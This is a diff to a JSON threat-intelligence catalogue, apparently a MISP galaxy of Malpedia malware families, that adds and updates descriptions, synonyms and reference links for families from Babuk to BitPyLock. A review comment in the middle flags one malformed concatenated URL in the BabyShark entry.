"https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [ "SNOWBALL" 
@@ -4559,6 +9062,28 @@ "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/", + "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62", + "https://twitter.com/Sebdraven/status/1346377590525845504", + "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + ], + "synonyms": [ + "Babyk Ransomware", + "Vasa Locker" + ], + "type": [] + }, + "uuid": "3e243686-a0a0-4aff-b149-786cc3f99a84", + "value": "Babuk Ransomware" + }, { "description": "", "meta": { @@ -4573,10 +9098,12 @@ "value": "BabyLon RAT" }, { - "description": "", + "description": "BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], 
@@ -4585,6 +9112,27 @@ "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, + { + "description": "BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://blog.alyac.co.kr/3352", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://twitter.com/i/web/status/1099147896950185985", + "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37", + "value": "BabyShark" + }, { "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). 
If either of the mutexes exist, the malware exits.", "meta": { @@ -4615,12 +9163,30 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff", + "https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/" ], "synonyms": [], "type": [] }, + "uuid": "70f68c8c-4dc5-4bb0-9f4d-a7484561574b", + "value": "Backoff POS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", + "https://www.secureworks.com/research/threat-profiles/bronze-geneva", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [ + "Lecna", + "ZRLnk" + ], + "type": [] + }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", "value": "backspace" }, @@ -4633,7 +9199,9 @@ "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", "https://research.checkpoint.com/the-evolution-of-backswap/", + "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" ], "synonyms": [], 
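Review bot: The last BabyShark ref on the new side is two URLs concatenated into one string, `...tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/...part-2.html`, which is not a valid URL and will break any consumer that dereferences galaxy refs. The part-2 article is already listed separately a few lines above, so the entry should be reduced to `"https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html"`. If the file is regenerated from the Malpedia export, the broken entry needs fixing at the source as well, and it would be worth adding a validation step to the update pipeline that checks each ref parses as a single absolute URL. The BACKBEND entry that follows continues past the end of this hunk.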
@@ -4642,6 +9210,20 @@ "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", "value": "BackSwap" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9ddf546b-487f-44e4-b0dd-07e9997c86c6", + "value": "BADCALL (Windows)" + }, { "description": "", "meta": { @@ -4675,10 +9257,15 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", + "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign", + "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/" ], "synonyms": [], "type": [] 
@@ -4704,6 +9291,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ], "synonyms": [], 
@@ -4716,17 +9304,59 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf",
+ "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/",
 "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/",
 "https://www.youtube.com/watch?v=E2V4kB_gtcQ"
 ],
 "synonyms": [
- "Baldr"
+ "Baldir"
 ],
 "type": []
 },
 "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95",
- "value": "Baldir"
+ "value": "Baldr"
+ },
+ {
+ "description": "According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door",
+ "https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "22d61347-4d89-41e7-89dc-95b1f370522d",
+ "value": "BalkanDoor"
+ },
+ {
+ "description": "The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accouting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimaly signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250). ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_rat",
+ "https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d7b40333-a2ce-423d-9052-51b09bf18bb3",
+ "value": "BalkanRAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital",
+ "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/",
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f355f41b-a6b2-48b7-9c5c-da99a41cb1ad",
+ "value": "Bamital"
 },
 {
 "description": "",
@@ -4741,6 +9371,38 @@
 "uuid": "721fe429-f240-4fd6-a5c9-187195624b51",
 "value": "Banatrix"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bancos",
+ "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a2ee2f24-ead8-4415-b777-7190478a620c",
+ "value": "bancos"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook",
+ "https://twitter.com/malwrhunterteam/status/796425285197561856",
+ "https://research.checkpoint.com/2020/bandook-signed-delivered/",
+ "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
+ "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
+ ],
+ "synonyms": [
+ "Bandok"
+ ],
+ "type": []
+ },
+ "uuid": "3144e23d-6e3e-47e6-8f0e-a47be25d1041",
+ "value": "Bandook"
+ },
 {
 "description": "",
 "meta": {
@@ -4779,10 +9441,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a",
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
- "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/"
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://blog.reversinglabs.com/blog/hidden-cobra"
+ ],
+ "synonyms": [
+ "COPPERHEDGE"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
@@ -4792,7 +9461,23 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork",
+ "https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d2cdaceb-7810-4c80-9a69-0a6f27832725",
+ "value": "barkiofork"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
 ],
 "synonyms": [],
 "type": []
@@ -4817,7 +9502,8 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel",
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
 ],
 "synonyms": [],
 "type": []
@@ -4825,11 +9511,97 @@
 "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e",
 "value": "Batel"
 },
+ {
+ "description": "BazarBackdoor is a small backdoor, probably by a TrickBot \"spin-off\" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).\r\n\r\nFor now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
+ "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
+ "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
+ "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
+ "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
+ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
+ "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
+ "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
+ "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
+ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
+ "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
+ "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/"
+ ],
+ "synonyms": [
+ "BEERBOT",
+ "BazarCall",
+ "KEGTAP",
+ "Team9Backdoor",
+ "bazaloader"
+ ],
+ "type": []
+ },
+ "uuid": "3b1a6ba7-9617-4413-a4ad-66f5d9870bb7",
+ "value": "BazarBackdoor"
+ },
+ {
+ "description": "A rewrite of Bazarloader in the Nim programming language.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod",
+ "https://twitter.com/James_inthe_box/status/1357009652857196546",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1735a331-9ca9-49b6-a5aa-0ddac9db8de6",
+ "value": "BazarNimrod"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat",
+ "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae",
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb",
 "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
 ],
 "synonyms": [],
@@ -4838,6 +9610,19 @@
 "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a",
 "value": "BBSRAT"
 },
+ {
+ "description": "360 Security Center describes BBtok as a banking trojan targeting Mexico.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok",
+ "https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0b114f49-8c4d-425d-8426-a0c4ab145f36",
+ "value": "BBtok"
+ },
 {
 "description": "",
 "meta": {
@@ -4863,6 +9648,19 @@
 "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b",
 "value": "Bedep"
 },
+ {
+ "description": "Malware family observed in conjunction with PlugX infrastructure in 2013.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee",
+ "https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfffe201c5bedefe260d22ac908/detection"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2d4aacb7-392a-46fd-b93d-33fcdaeb348f",
+ "value": "Bee"
+ },
 {
 "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.",
 "meta": {
@@ -4876,6 +9674,19 @@
 "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90",
 "value": "beendoor"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice",
+ "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1732faab-2cf9-4d79-a085-6331da008047",
+ "value": "BeepService"
+ },
 {
 "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.",
 "meta": {
@@ -4915,6 +9726,19 @@
 "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41",
 "value": "BernhardPOS"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bestkorea",
+ "https://github.com/Jacquais/BestKorea"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "33308a2c-b1ef-4cbb-9240-25cb6dce55a9",
+ "value": "BestKorea"
+ },
 {
 "description": "",
 "meta": {
@@ -4924,8 +9748,9 @@
 "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
 "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
 "http://www.xylibox.com/2015/04/betabot-retrospective.html",
- "https://asert.arbornetworks.com/beta-bot-a-code-review/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
 "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
+ "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
 "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
 "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html"
 ],
@@ -4962,14 +9787,44 @@
 "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899",
 "value": "BfBot"
 },
+ {
+ "description": "Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware",
+ "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/",
+ "http://zirconic.net/2018/07/bi_d-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9f80bebb-dc5d-4cc1-b2dc-16bca1bbfaad",
+ "value": "BI_D Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bifrose",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/",
+ "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "47e654af-8b94-4b97-a2ea-6a28c1bc8099",
+ "value": "bifrose"
+ },
 {
 "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates",
 "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
+ "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html",
+ "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf",
 "https://habrahabr.ru/post/213973/",
- "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf"
+ "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/"
 ],
 "synonyms": [],
 "type": []
@@ -4977,6 +9832,20 @@
 "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6",
 "value": "BillGates"
 },
+ {
+ "description": "Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen",
+ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx",
+ "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a76a35e4-6ef7-45ad-9656-98584835d910",
+ "value": "Binanen"
+ },
 {
 "description": "",
 "meta": {
@@ -4991,6 +9860,19 @@
 "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7",
 "value": "BioData"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bioload",
+ "https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "04803315-fc17-44d0-839e-534b9da4c7fc",
+ "value": "bioload"
+ },
 {
 "description": "",
 "meta": {
@@ -5010,12 +9892,45 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran",
- "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a"
 ],
 "synonyms": [],
 "type": []
 },
+ "uuid": "fa8b2a91-ec55-41cc-b5f6-3d233cc3cc65",
+ "value": "BISTROMATH"
+ },
+ {
+ "description": "Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user's Desktop with the following name: \"# # HELP_TO_DECRYPT_YOUR_FILES # .html\". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock",
+ "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview",
+ "https://twitter.com/malwrhunterteam/status/1215252402988822529",
+ "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "da5adcc1-9adc-4e86-9034-08aafecc14c1",
+ "value": "BitPyLock"
+ },
+ {
+ "description": "SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.",
+ "meta": {
